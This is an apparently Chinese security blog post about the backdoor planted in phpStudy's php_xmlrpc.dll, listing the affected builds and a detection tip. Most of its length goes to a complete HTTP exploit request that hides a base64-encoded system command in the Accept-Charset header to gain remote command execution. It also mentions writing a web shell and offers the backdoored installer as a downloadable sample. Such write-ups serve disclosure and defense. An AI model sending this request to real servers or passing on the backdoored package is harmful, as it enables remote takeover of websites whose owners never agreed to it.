本文最后更新于 2019年10月13日,共计 215 字,欢迎文章底部讨论。

漏洞简介

phpstudy是一款php调试环境集成工具,包含 apache、iis、nginx等中间件。本次为该软件被植入后门引发的远程命令执行,现实中很多站长还在使用类似的集成工具应用在现网环境里。

影响范围

目前已知的:

Phpstudy 2016 版 php-5.4
Phpstudy 2018 版 php-5.2.17
Phpstudy 2018 版 php-5.4.45

漏洞检测

  • 1.使用批量脚本

2019-10-08T08:24:29.png

  • 2.直接查看问题dll文件

查看 php/版本/ext/php_xmlrpc.dll 文件,搜索 eval 查看,如下则存在后门:
2019-10-08T08:24:39.png

漏洞利用

GET /l.php HTTP/1.1
Host: test.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: zh-CN
Accept-Encoding: gzip
Accept-Charset: 这里就是要执行的命令base64加密(重点在这里)
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close
  • 1.命令交互下的:

2019-10-08T08:24:50.png

  • 2.直接写shell的

2019-10-08T08:25:03.png
2019-10-08T08:25:10.png

后门软件下载

虽然phpstudy使用的很多,刚好使用了存在后门的,且使用了那几个php版本的,网络空间搜索引擎搜了下,不是很多。这里放一个后门软件样本,仅供测试,勿生产环境使用。
phpStudy20161103.zip

文章目录